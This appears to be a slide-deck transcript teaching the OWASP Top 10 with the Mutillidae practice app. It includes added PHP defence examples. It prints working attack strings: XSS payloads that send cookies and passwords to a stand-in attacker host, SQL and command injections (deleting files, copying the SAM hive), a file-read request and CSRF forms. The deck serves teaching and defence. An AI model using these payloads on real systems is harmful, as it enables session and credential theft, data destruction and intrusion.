The document discusses various web application vulnerabilities from the OWASP Top 10 list, including cross-site scripting (XSS), SQL injection, remote file inclusion, insecure direct object references, and cross-site request forgery (CSRF). It provides examples of each vulnerability type and recommendations for prevention. It also introduces Mutillidae, a deliberately vulnerable web application that can be used to demonstrate these vulnerabilities in a controlled environment.
2. http://Irongeek.com
I run Irongeek.com
I have an interest in InfoSec education
I don’t know everything - I’m just a geek with time on my hands
I’m also not a professional web developer, so creating crappy code was easy for me.
So why listen to me? Sometimes it takes a noob to teach a noob.
3.
OWASP Top 10
http://www.owasp.org/index.php/OWASP_Top_Ten_Project
(As a side note, I’ve copied quite a few of their descriptions and fixes into this presentation)
Mutillidae
http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
Ok, but what are those?
4.
The 2007 list includes:
A1 - Cross Site Scripting (XSS)
A2 - Injection Flaws
A3 - Malicious File Execution
A4 - Insecure Direct Object Reference
A5 - Cross Site Request Forgery (CSRF)
A6 - Information Leakage and Improper Error Handling
A7 - Broken Authentication and Session Management
A8 - Insecure Cryptographic Storage
A9 - Insecure Communications
A10 - Failure to Restrict URL Access
The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are.
5.
A teaching tool for illustrating the OWASP Top 10
Written in PHP/MySQL
Meant to be simpler than WebGoat
Simple to exploit, just to get the concept across
Easy to reset
Includes a “Tips” function to help the student
7.
XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.
9.
Simple:
<script>alert("XSS");</script>
Page Redirect:
<script>window.location = "http://www.irongeek.com/"</script>
Cookie Stealing:
<script>
new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie);
</script>
Password Con:
<script>
username=prompt('Please enter your username',' ');
password=prompt('Please enter your password',' ');
document.write('<img src="http://attacker.hak/catch.php?username='+username+'&password='+password+'">');
</script>
10.
External Javascript:
<script src="http://ha.ckers.org/xss.js"></script>
Hot BeEF Injection:
<script language='Javascript' src='http://localhost/beef/hook/beefmagic.js.php'></script>
How about the User Agent string?
12.
Input validation.
Strong output encoding, e.g. htmlspecialchars() in PHP.
Specify the output encoding.
Do not use "blacklist" validation to detect XSS in input or to encode output.
Watch out for canonicalization errors.
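The output-encoding advice above in working form, as an added example that is neither Irongeek's code nor Mutillidae's: a PHP page that echoes the slide 9 alert() payload, first unencoded and then through htmlspecialchars() with the charset stated. Function names are my own.

```php
<?php
// Added example, not from the Irongeek slides or Mutillidae: the alert()
// payload from slide 9 echoed by a PHP page, first unsafely, then encoded.
declare(strict_types=1);

// Vulnerable: user-supplied data goes to the browser without encoding,
// so the <script> element inside it is parsed and executed.
function renderVulnerable(string $name): string
{
    return '<p>Hello, ' . $name . '</p>';
}

// Hardened: encode on output. ENT_QUOTES also escapes single quotes, which
// matters when the value lands inside an attribute; the charset is given
// explicitly so htmlspecialchars() and the browser agree on the encoding.
function renderHardened(string $name): string
{
    $safe = htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<p>Hello, ' . $safe . '</p>';
}

// Same idea for a value placed in an attribute: encode, and quote the attribute.
function renderAttribute(string $value): string
{
    $safe = htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="name" value="' . $safe . '">';
}

// Specify the output encoding on the response as well (slide 12), so the
// browser does not guess a charset the encoder did not account for.
header('Content-Type: text/html; charset=UTF-8');

// Constructed sample input: the "Simple" payload from slide 9. A real page
// would read it from $_GET['name'] or from a stored record.
$input = '<script>alert("XSS");</script>';

// renderVulnerable($input) would return the payload verbatim. The hardened
// functions return it with <, >, " and ' replaced by HTML entities, which the
// browser renders as text and never executes.
echo renderHardened($input), "\n";
echo renderAttribute($input), "\n";
```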
13.
Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data.
14.
The Code:
"SELECT * FROM accounts WHERE username='" . $username . "' AND password='" . stripslashes($password) . "'"
or
echo shell_exec("nslookup " . $targethost);
Expected to fill in the string to:
SELECT * FROM accounts WHERE username='adrian' AND password='somepassword'
or
nslookup irongeek.com
But what if the person injected:
SELECT * FROM accounts WHERE username='adrian' AND password='somepassword' or 1=1 -- '
or
nslookup irongeek.com && del *.*
15.
Simple SQL Injection:
' or 1=1 --
Wish I could do this, but can't stack queries in MySQL/PHP:
'; DROP TABLE owasp10; --
Command Injections:
&& dir
&& wmic process list
&& wmic useraccount list
&& copy c:\WINDOWS\repair\sam && copy c:\WINDOWS\repair\system.bak
(use ; as a separator if you are running this on Linux)
16.
SQL Injection Cheat Sheet
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
SQL Injection Attacks by Example
http://unixwiz.net/techtips/sql-injection.html
Command line Kung Fu
http://blog.commandlinekungfu.com/
17.
Input validation.
Use strongly typed parameterized query APIs (bound parameters).
Enforce least privilege.
Avoid detailed error messages.
Show care when using stored procedures.
Do not use dynamic query interfaces.
Do not use simple escaping functions.
Watch out for canonicalization errors.
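The two vulnerable snippets from slide 14 rewritten along the lines of this slide, as an added example that is not Irongeek's or Mutillidae's code: a bound-parameter login query and a validated, escaped nslookup call. It assumes PDO, an in-memory SQLite database standing in for MySQL, and a hostname grammar of my own choosing.

```php
<?php
// Added example, not from the slides or Mutillidae: the login query and the
// nslookup call from slide 14 rewritten along the lines of slide 17. Uses an
// in-memory SQLite database as a stand-in for MySQL so it runs offline.
declare(strict_types=1);

// Parameterized query with bound parameters: the user's values travel
// separately from the SQL text, so "somepassword' or 1=1 -- " is compared
// literally against the password column instead of rewriting the WHERE clause.
// (Plaintext passwords only mirror slide 14; real code stores password hashes.)
function findAccount(PDO $db, string $username, string $password): ?array
{
    $stmt = $db->prepare(
        'SELECT * FROM accounts WHERE username = :username AND password = :password'
    );
    $stmt->bindValue(':username', $username, PDO::PARAM_STR);
    $stmt->bindValue(':password', $password, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Command injection: validate with "accept known good" (an assumed hostname
// grammar; adjust for your environment), then hand the value to the shell as
// one quoted argument. "irongeek.com && del *.*" fails validation and never
// reaches the shell; even if it did, escapeshellarg() makes it a single argument.
function lookupHost(string $targethost): string
{
    $hostname = '/^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$/i';
    if (preg_match($hostname, $targethost) !== 1) {
        throw new InvalidArgumentException('Not a valid hostname: ' . $targethost);
    }
    return (string) shell_exec('nslookup ' . escapeshellarg($targethost));
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// With a MySQL DSN, also turn off client-side emulation so the server binds:
// $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
$db->exec('CREATE TABLE accounts (username TEXT, password TEXT)');
$db->exec("INSERT INTO accounts VALUES ('adrian', 'somepassword')");

// The real credentials match a row; the injected string matches nothing,
// because it is compared as a literal password value.
$legit    = findAccount($db, 'adrian', 'somepassword');
$injected = findAccount($db, 'adrian', "somepassword' or 1=1 -- ");

try {
    lookupHost('irongeek.com && del *.*');
} catch (InvalidArgumentException $e) {
    // rejected by validation before any command runs
}
```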
18.
Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.
19.
Grabbing a local file:
http://target.hak/index.php?page=source-viewer.php&php_file_name=config.inc
Tamper Data, POST data and an inadvertent proxy
21.
Strongly validate user input using "accept known good" as a strategy.
Add firewall rules to prevent web servers making new connections to external web sites and internal systems.
Consider implementing a chroot jail or other sandbox mechanisms.
# PHP: Disable allow_url_fopen and allow_url_include in php.ini and consider building PHP locally to not include this functionality.
# PHP: Disable register_globals and use E_STRICT to find uninitialized variables.
# PHP: Ensure that all file and streams functions (stream_*) are carefully vetted.
22.
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.
24.
Avoid exposing your private object references to users whenever possible, such as primary keys or filenames.
Validate any private object references extensively with an "accept known good" approach.
Verify authorization to all referenced objects.
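The "accept known good" advice from slide 21 and the object-reference advice from this slide in one added example (not Irongeek's or Mutillidae's code): an index.php?page=... dispatcher that maps opaque page keys to files instead of taking filenames from the URL, a startup check of the php.ini setting, and a record lookup that verifies ownership. Table and column names are assumed.

```php
<?php
// Added example, not from the slides or Mutillidae: an index.php?page=...
// dispatcher rebuilt with "accept known good" (slide 21) so the page parameter
// is an opaque key rather than a filename (slide 24), plus an ownership check
// on a record id. Table and column names are assumed.
declare(strict_types=1);

// Allowlist of page keys the user may request, mapped to files the code
// chooses. "config.inc", "../" and http:// URLs are simply not in the table.
const PAGES = [
    'home'             => 'home.php',
    'add-to-your-blog' => 'add-to-your-blog.php',
    'view-blog'        => 'view-blog.php',
];

function resolvePage(string $requested): string
{
    if (!array_key_exists($requested, PAGES)) {
        throw new RuntimeException('Unknown page: ' . $requested);
    }
    // Only values from the constant table are ever joined to the path.
    return __DIR__ . '/pages/' . PAGES[$requested];
}

// php.ini hardening from slide 21, checked at startup so a misconfigured
// deployment fails loudly instead of quietly allowing remote includes.
// (allow_url_fopen should be reviewed the same way if nothing needs it.)
function assertNoRemoteIncludes(): void
{
    if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
        throw new RuntimeException('allow_url_include must be Off in php.ini');
    }
}

// Verify authorization to every referenced object (slide 24): a blog entry is
// returned only if both the id and the logged-in user's id match.
function loadOwnBlogEntry(PDO $db, int $entryId, int $sessionUserId): ?array
{
    $stmt = $db->prepare(
        'SELECT id, body FROM blog_entries WHERE id = :id AND owner_id = :uid'
    );
    $stmt->bindValue(':id', $entryId, PDO::PARAM_INT);
    $stmt->bindValue(':uid', $sessionUserId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

assertNoRemoteIncludes();

// Constructed sample data: in-memory SQLite standing in for MySQL.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE blog_entries (id INTEGER, owner_id INTEGER, body TEXT)');
$db->exec("INSERT INTO blog_entries VALUES (1, 10, 'mine'), (2, 20, 'someone else')");

$page = resolvePage('add-to-your-blog');   // a key from the table
try {
    resolvePage('source-viewer.php');      // the slide 19 request is refused
} catch (RuntimeException $e) {
    // nothing was included
}
$own   = loadOwnBlogEntry($db, 1, 10);     // entry 1 belongs to user 10
$other = loadOwnBlogEntry($db, 2, 10);     // entry 2 does not, so nothing is returned
```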
25.
A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.
26.
(Diagram with three parties: Target Web App, Client, and a Website the attacker controls.)
1. Session established with web app via a cookie (already logged in).
2. At some later point, content that the attacker controls is requested.
3. Attacker serves up content that asks the client’s browser to make a request.
4. Client makes the request, and since it already has a session cookie the request is honored.
27.
Let’s visit a page with this lovely link:
<img src="http://target.hak/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy">
Don’t want to use a bad image? Try an Iframe:
<iframe src="http://target.hak/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy" style="width:0px; height:0px; border: 0px"></iframe>
Can’t use the GET method? Try something like:
<html> <body>
<form name="csrfform" method="post" action="http://target.hak/index.php?page=add-to-your-blog.php">
<input type='hidden' name='input_from_form' value="Test of auto-submitted form.">
</form>
<script>document.csrfform.submit()</script>
</body></html>
28.
CSRF Flaws Found On Major Websites, Including a Bank
http://it.slashdot.org/article.pl?sid=08/09/30/0136219
CSRF Home Router Fun
http://www.gnucitizen.org/blog/persistent-xss-and-csrf-on-wireless-g-adsl-gateway-with-speedbooster-wag54gs/
CSRF in Gmail
http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
29.
For sensitive data or value transactions, re-authenticate or use transaction signing to ensure that the request is genuine.
Do not use GET requests (URLs) for sensitive data or to perform value transactions. (see next point)
POST alone is insufficient protection.
Consider adding Captchas and extra session values as hidden form elements.
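The "extra session values as hidden form elements" defence from this slide applied to the add-to-your-blog form that slide 27 targets, as an added example that is not Irongeek's or Mutillidae's code. It assumes PHP sessions; the field and function names are my own.

```php
<?php
// Added example, not from the slides or Mutillidae: a per-session CSRF token
// carried as a hidden form field (slide 29), checked on the POST that
// slide 27's auto-submitting form tries to forge.
declare(strict_types=1);

session_start();

// One unpredictable token per session, from the CSPRNG.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// The legitimate form carries the token. The attacker's page on slide 27
// runs in a different origin, cannot read this value, and so cannot put it
// in its own form; the session cookie alone no longer authorizes the action.
function renderBlogForm(): string
{
    $token = htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="index.php?page=add-to-your-blog.php">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input type="text" name="input_from_form">'
         . '<input type="submit" value="Save"></form>';
}

// Refuse GET for the state change (slide 29) and require a token that matches
// the session's. hash_equals() compares in constant time.
function isValidBlogPost(string $method, array $post, ?string $sessionToken): bool
{
    if ($method !== 'POST' || $sessionToken === null) {
        return false;
    }
    $submitted = $post['csrf_token'] ?? '';
    return is_string($submitted) && hash_equals($sessionToken, $submitted);
}

// Constructed requests: the real form's submission, the forged form from
// slide 27 (no token), and the slide 27 <img> request (GET).
$legit  = ['input_from_form' => 'hello', 'csrf_token' => csrfToken()];
$forged = ['input_from_form' => 'hi there monkeyboy'];
$stored = $_SESSION['csrf_token'] ?? null;

if (isValidBlogPost('POST', $legit, $stored)) {
    // safe to write the blog entry
}
if (!isValidBlogPost('POST', $forged, $stored) && !isValidBlogPost('GET', $forged, $stored)) {
    http_response_code(403); // both forged requests are refused
}
```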
30.
Deliberately Insecure Web Applications For Learning Web App Security
http://www.irongeek.com/i.php?page=security/deliberately-insecure-web-applications-for-learning-web-app-security